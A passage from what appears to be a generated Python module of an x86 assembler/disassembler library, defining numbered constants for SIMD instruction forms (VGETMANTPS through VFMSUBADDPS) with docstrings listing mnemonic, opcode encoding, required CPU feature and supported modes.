``EVEX.512.66.0F3A.W1 25 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTPS_XMM_K1Z_XMMM128B32_IMM8: int = 3853
"""
``VGETMANTPS xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 26 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTPS_YMM_K1Z_YMMM256B32_IMM8: int = 3854
"""
``VGETMANTPS ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 26 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTPS_ZMM_K1Z_ZMMM512B32_IMM8_SAE: int = 3855
"""
``VGETMANTPS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}, imm8``
``EVEX.512.66.0F3A.W0 26 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTPD_XMM_K1Z_XMMM128B64_IMM8: int = 3856
"""
``VGETMANTPD xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 26 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTPD_YMM_K1Z_YMMM256B64_IMM8: int = 3857
"""
``VGETMANTPD ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 26 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTPD_ZMM_K1Z_ZMMM512B64_IMM8_SAE: int = 3858
"""
``VGETMANTPD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}, imm8``
``EVEX.512.66.0F3A.W1 26 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTSS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3859
"""
``VGETMANTSS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}, imm8``
``EVEX.LIG.66.0F3A.W0 27 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTSD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3860
"""
``VGETMANTSD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}, imm8``
``EVEX.LIG.66.0F3A.W1 27 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_KSHIFTRB_KR_KR_IMM8: int = 3861
"""
``KSHIFTRB k1, k2, imm8``
``VEX.L0.66.0F3A.W0 30 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KSHIFTRW_KR_KR_IMM8: int = 3862
"""
``KSHIFTRW k1, k2, imm8``
``VEX.L0.66.0F3A.W1 30 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_KSHIFTRD_KR_KR_IMM8: int = 3863
"""
``KSHIFTRD k1, k2, imm8``
``VEX.L0.66.0F3A.W0 31 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KSHIFTRQ_KR_KR_IMM8: int = 3864
"""
``KSHIFTRQ k1, k2, imm8``
``VEX.L0.66.0F3A.W1 31 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KSHIFTLB_KR_KR_IMM8: int = 3865
"""
``KSHIFTLB k1, k2, imm8``
``VEX.L0.66.0F3A.W0 32 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KSHIFTLW_KR_KR_IMM8: int = 3866
"""
``KSHIFTLW k1, k2, imm8``
``VEX.L0.66.0F3A.W1 32 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_KSHIFTLD_KR_KR_IMM8: int = 3867
"""
``KSHIFTLD k1, k2, imm8``
``VEX.L0.66.0F3A.W0 33 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KSHIFTLQ_KR_KR_IMM8: int = 3868
"""
``KSHIFTLQ k1, k2, imm8``
``VEX.L0.66.0F3A.W1 33 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
VEX_VINSERTI128_YMM_YMM_XMMM128_IMM8: int = 3869
"""
``VINSERTI128 ymm1, ymm2, xmm3/m128, imm8``
``VEX.256.66.0F3A.W0 38 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VINSERTI32X4_YMM_K1Z_YMM_XMMM128_IMM8: int = 3870
"""
``VINSERTI32X4 ymm1 {k1}{z}, ymm2, xmm3/m128, imm8``
``EVEX.256.66.0F3A.W0 38 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VINSERTI32X4_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3871
"""
``VINSERTI32X4 zmm1 {k1}{z}, zmm2, xmm3/m128, imm8``
``EVEX.512.66.0F3A.W0 38 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VINSERTI64X2_YMM_K1Z_YMM_XMMM128_IMM8: int = 3872
"""
``VINSERTI64X2 ymm1 {k1}{z}, ymm2, xmm3/m128, imm8``
``EVEX.256.66.0F3A.W1 38 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VINSERTI64X2_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3873
"""
``VINSERTI64X2 zmm1 {k1}{z}, zmm2, xmm3/m128, imm8``
``EVEX.512.66.0F3A.W1 38 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_VEXTRACTI128_XMMM128_YMM_IMM8: int = 3874
"""
``VEXTRACTI128 xmm1/m128, ymm2, imm8``
``VEX.256.66.0F3A.W0 39 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VEXTRACTI32X4_XMMM128_K1Z_YMM_IMM8: int = 3875
"""
``VEXTRACTI32X4 xmm1/m128 {k1}{z}, ymm2, imm8``
``EVEX.256.66.0F3A.W0 39 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTI32X4_XMMM128_K1Z_ZMM_IMM8: int = 3876
"""
``VEXTRACTI32X4 xmm1/m128 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W0 39 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTI64X2_XMMM128_K1Z_YMM_IMM8: int = 3877
"""
``VEXTRACTI64X2 xmm1/m128 {k1}{z}, ymm2, imm8``
``EVEX.256.66.0F3A.W1 39 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VEXTRACTI64X2_XMMM128_K1Z_ZMM_IMM8: int = 3878
"""
``VEXTRACTI64X2 xmm1/m128 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W1 39 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VINSERTI32X8_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3879
"""
``VINSERTI32X8 zmm1 {k1}{z}, zmm2, ymm3/m256, imm8``
``EVEX.512.66.0F3A.W0 3A /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VINSERTI64X4_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3880
"""
``VINSERTI64X4 zmm1 {k1}{z}, zmm2, ymm3/m256, imm8``
``EVEX.512.66.0F3A.W1 3A /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTI32X8_YMMM256_K1Z_ZMM_IMM8: int = 3881
"""
``VEXTRACTI32X8 ymm1/m256 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W0 3B /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VEXTRACTI64X4_YMMM256_K1Z_ZMM_IMM8: int = 3882
"""
``VEXTRACTI64X4 ymm1/m256 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W1 3B /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPUB_KR_K1_XMM_XMMM128_IMM8: int = 3883
"""
``VPCMPUB k1 {k2}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W0 3E /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPUB_KR_K1_YMM_YMMM256_IMM8: int = 3884
"""
``VPCMPUB k1 {k2}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W0 3E /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPUB_KR_K1_ZMM_ZMMM512_IMM8: int = 3885
"""
``VPCMPUB k1 {k2}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W0 3E /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPUW_KR_K1_XMM_XMMM128_IMM8: int = 3886
"""
``VPCMPUW k1 {k2}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W1 3E /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPUW_KR_K1_YMM_YMMM256_IMM8: int = 3887
"""
``VPCMPUW k1 {k2}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W1 3E /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPUW_KR_K1_ZMM_ZMMM512_IMM8: int = 3888
"""
``VPCMPUW k1 {k2}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W1 3E /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPB_KR_K1_XMM_XMMM128_IMM8: int = 3889
"""
``VPCMPB k1 {k2}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W0 3F /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPB_KR_K1_YMM_YMMM256_IMM8: int = 3890
"""
``VPCMPB k1 {k2}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W0 3F /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPB_KR_K1_ZMM_ZMMM512_IMM8: int = 3891
"""
``VPCMPB k1 {k2}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W0 3F /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPW_KR_K1_XMM_XMMM128_IMM8: int = 3892
"""
``VPCMPW k1 {k2}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W1 3F /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPW_KR_K1_YMM_YMMM256_IMM8: int = 3893
"""
``VPCMPW k1 {k2}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W1 3F /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPW_KR_K1_ZMM_ZMMM512_IMM8: int = 3894
"""
``VPCMPW k1 {k2}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W1 3F /r ib``
``AVX512BW``
``16/32/64-bit``
"""
DPPS_XMM_XMMM128_IMM8: int = 3895
"""
``DPPS xmm1, xmm2/m128, imm8``
``66 0F 3A 40 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VDPPS_XMM_XMM_XMMM128_IMM8: int = 3896
"""
``VDPPS xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 40 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VDPPS_YMM_YMM_YMMM256_IMM8: int = 3897
"""
``VDPPS ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 40 /r ib``
``AVX``
``16/32/64-bit``
"""
DPPD_XMM_XMMM128_IMM8: int = 3898
"""
``DPPD xmm1, xmm2/m128, imm8``
``66 0F 3A 41 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VDPPD_XMM_XMM_XMMM128_IMM8: int = 3899
"""
``VDPPD xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 41 /r ib``
``AVX``
``16/32/64-bit``
"""
MPSADBW_XMM_XMMM128_IMM8: int = 3900
"""
``MPSADBW xmm1, xmm2/m128, imm8``
``66 0F 3A 42 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VMPSADBW_XMM_XMM_XMMM128_IMM8: int = 3901
"""
``VMPSADBW xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 42 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VMPSADBW_YMM_YMM_YMMM256_IMM8: int = 3902
"""
``VMPSADBW ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 42 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VDBPSADBW_XMM_K1Z_XMM_XMMM128_IMM8: int = 3903
"""
``VDBPSADBW xmm1 {k1}{z}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W0 42 /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VDBPSADBW_YMM_K1Z_YMM_YMMM256_IMM8: int = 3904
"""
``VDBPSADBW ymm1 {k1}{z}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W0 42 /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VDBPSADBW_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 3905
"""
``VDBPSADBW zmm1 {k1}{z}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W0 42 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VSHUFI32X4_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3906
"""
``VSHUFI32X4 ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 43 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFI32X4_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3907
"""
``VSHUFI32X4 zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 43 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFI64X2_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3908
"""
``VSHUFI64X2 ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 43 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFI64X2_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3909
"""
``VSHUFI64X2 zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 43 /r ib``
``AVX512F``
``16/32/64-bit``
"""
PCLMULQDQ_XMM_XMMM128_IMM8: int = 3910
"""
``PCLMULQDQ xmm1, xmm2/m128, imm8``
``66 0F 3A 44 /r ib``
``PCLMULQDQ``
``16/32/64-bit``
"""
VEX_VPCLMULQDQ_XMM_XMM_XMMM128_IMM8: int = 3911
"""
``VPCLMULQDQ xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 44 /r ib``
``PCLMULQDQ and AVX``
``16/32/64-bit``
"""
VEX_VPCLMULQDQ_YMM_YMM_YMMM256_IMM8: int = 3912
"""
``VPCLMULQDQ ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 44 /r ib``
``VPCLMULQDQ``
``16/32/64-bit``
"""
EVEX_VPCLMULQDQ_XMM_XMM_XMMM128_IMM8: int = 3913
"""
``VPCLMULQDQ xmm1, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.WIG 44 /r ib``
``AVX512VL and VPCLMULQDQ``
``16/32/64-bit``
"""
EVEX_VPCLMULQDQ_YMM_YMM_YMMM256_IMM8: int = 3914
"""
``VPCLMULQDQ ymm1, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.WIG 44 /r ib``
``AVX512VL and VPCLMULQDQ``
``16/32/64-bit``
"""
EVEX_VPCLMULQDQ_ZMM_ZMM_ZMMM512_IMM8: int = 3915
"""
``VPCLMULQDQ zmm1, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.WIG 44 /r ib``
``AVX512F and VPCLMULQDQ``
``16/32/64-bit``
"""
VEX_VPERM2I128_YMM_YMM_YMMM256_IMM8: int = 3916
"""
``VPERM2I128 ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.W0 46 /r ib``
``AVX2``
``16/32/64-bit``
"""
VEX_VPERMIL2PS_XMM_XMM_XMMM128_XMM_IMM4: int = 3917
"""
``VPERMIL2PS xmm1, xmm2, xmm3/m128, xmm4, imm4``
``VEX.128.66.0F3A.W0 48 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PS_YMM_YMM_YMMM256_YMM_IMM4: int = 3918
"""
``VPERMIL2PS ymm1, ymm2, ymm3/m256, ymm4, imm4``
``VEX.256.66.0F3A.W0 48 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PS_XMM_XMM_XMM_XMMM128_IMM4: int = 3919
"""
``VPERMIL2PS xmm1, xmm2, xmm3, xmm4/m128, imm4``
``VEX.128.66.0F3A.W1 48 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PS_YMM_YMM_YMM_YMMM256_IMM4: int = 3920
"""
``VPERMIL2PS ymm1, ymm2, ymm3, ymm4/m256, imm4``
``VEX.256.66.0F3A.W1 48 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PD_XMM_XMM_XMMM128_XMM_IMM4: int = 3921
"""
``VPERMIL2PD xmm1, xmm2, xmm3/m128, xmm4, imm4``
``VEX.128.66.0F3A.W0 49 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PD_YMM_YMM_YMMM256_YMM_IMM4: int = 3922
"""
``VPERMIL2PD ymm1, ymm2, ymm3/m256, ymm4, imm4``
``VEX.256.66.0F3A.W0 49 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PD_XMM_XMM_XMM_XMMM128_IMM4: int = 3923
"""
``VPERMIL2PD xmm1, xmm2, xmm3, xmm4/m128, imm4``
``VEX.128.66.0F3A.W1 49 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PD_YMM_YMM_YMM_YMMM256_IMM4: int = 3924
"""
``VPERMIL2PD ymm1, ymm2, ymm3, ymm4/m256, imm4``
``VEX.256.66.0F3A.W1 49 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VBLENDVPS_XMM_XMM_XMMM128_XMM: int = 3925
"""
``VBLENDVPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 4A /r /is4``
``AVX``
``16/32/64-bit``
"""
VEX_VBLENDVPS_YMM_YMM_YMMM256_YMM: int = 3926
"""
``VBLENDVPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 4A /r /is4``
``AVX``
``16/32/64-bit``
"""
VEX_VBLENDVPD_XMM_XMM_XMMM128_XMM: int = 3927
"""
``VBLENDVPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 4B /r /is4``
``AVX``
``16/32/64-bit``
"""
VEX_VBLENDVPD_YMM_YMM_YMMM256_YMM: int = 3928
"""
``VBLENDVPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 4B /r /is4``
``AVX``
``16/32/64-bit``
"""
VEX_VPBLENDVB_XMM_XMM_XMMM128_XMM: int = 3929
"""
``VPBLENDVB xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 4C /r /is4``
``AVX``
``16/32/64-bit``
"""
VEX_VPBLENDVB_YMM_YMM_YMMM256_YMM: int = 3930
"""
``VPBLENDVB ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 4C /r /is4``
``AVX2``
``16/32/64-bit``
"""
EVEX_VRANGEPS_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3931
"""
``VRANGEPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 50 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGEPS_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3932
"""
``VRANGEPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 50 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGEPS_ZMM_K1Z_ZMM_ZMMM512B32_IMM8_SAE: int = 3933
"""
``VRANGEPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{sae}, imm8``
``EVEX.512.66.0F3A.W0 50 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGEPD_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3934
"""
``VRANGEPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 50 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGEPD_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3935
"""
``VRANGEPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 50 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGEPD_ZMM_K1Z_ZMM_ZMMM512B64_IMM8_SAE: int = 3936
"""
``VRANGEPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{sae}, imm8``
``EVEX.512.66.0F3A.W1 50 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGESS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3937
"""
``VRANGESS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}, imm8``
``EVEX.LIG.66.0F3A.W0 51 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGESD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3938
"""
``VRANGESD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}, imm8``
``EVEX.LIG.66.0F3A.W1 51 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMPS_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3939
"""
``VFIXUPIMMPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 54 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMPS_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3940
"""
``VFIXUPIMMPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 54 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMPS_ZMM_K1Z_ZMM_ZMMM512B32_IMM8_SAE: int = 3941
"""
``VFIXUPIMMPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{sae}, imm8``
``EVEX.512.66.0F3A.W0 54 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMPD_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3942
"""
``VFIXUPIMMPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 54 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMPD_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3943
"""
``VFIXUPIMMPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 54 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMPD_ZMM_K1Z_ZMM_ZMMM512B64_IMM8_SAE: int = 3944
"""
``VFIXUPIMMPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{sae}, imm8``
``EVEX.512.66.0F3A.W1 54 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMSS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3945
"""
``VFIXUPIMMSS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}, imm8``
``EVEX.LIG.66.0F3A.W0 55 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMSD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3946
"""
``VFIXUPIMMSD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}, imm8``
``EVEX.LIG.66.0F3A.W1 55 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VREDUCEPS_XMM_K1Z_XMMM128B32_IMM8: int = 3947
"""
``VREDUCEPS xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 56 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCEPS_YMM_K1Z_YMMM256B32_IMM8: int = 3948
"""
``VREDUCEPS ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 56 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCEPS_ZMM_K1Z_ZMMM512B32_IMM8_SAE: int = 3949
"""
``VREDUCEPS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}, imm8``
``EVEX.512.66.0F3A.W0 56 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCEPD_XMM_K1Z_XMMM128B64_IMM8: int = 3950
"""
``VREDUCEPD xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 56 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCEPD_YMM_K1Z_YMMM256B64_IMM8: int = 3951
"""
``VREDUCEPD ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 56 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCEPD_ZMM_K1Z_ZMMM512B64_IMM8_SAE: int = 3952
"""
``VREDUCEPD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}, imm8``
``EVEX.512.66.0F3A.W1 56 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCESS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3953
"""
``VREDUCESS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}, imm8``
``EVEX.LIG.66.0F3A.W0 57 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCESD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3954
"""
``VREDUCESD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}, imm8``
``EVEX.LIG.66.0F3A.W1 57 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_VFMADDSUBPS_XMM_XMM_XMMM128_XMM: int = 3955
"""
``VFMADDSUBPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 5C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPS_YMM_YMM_YMMM256_YMM: int = 3956
"""
``VFMADDSUBPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 5C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPS_XMM_XMM_XMM_XMMM128: int = 3957
"""
``VFMADDSUBPS xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 5C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPS_YMM_YMM_YMM_YMMM256: int = 3958
"""
``VFMADDSUBPS ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 5C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPD_XMM_XMM_XMMM128_XMM: int = 3959
"""
``VFMADDSUBPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 5D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPD_YMM_YMM_YMMM256_YMM: int = 3960
"""
``VFMADDSUBPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 5D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPD_XMM_XMM_XMM_XMMM128: int = 3961
"""
``VFMADDSUBPD xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 5D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPD_YMM_YMM_YMM_YMMM256: int = 3962
"""
``VFMADDSUBPD ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 5D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPS_XMM_XMM_XMMM128_XMM: int = 3963
"""
``VFMSUBADDPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 5E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPS_YMM_YMM_YMMM256_YMM: int = 3964
"""
``VFMSUBADDPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 5E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPS_XMM_XMM_XMM_XMMM128: int = 3965
"""
``VFMSUBADDPS xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 5E /r /is4``
``FMA4``
``16/32/64-bit``
"""
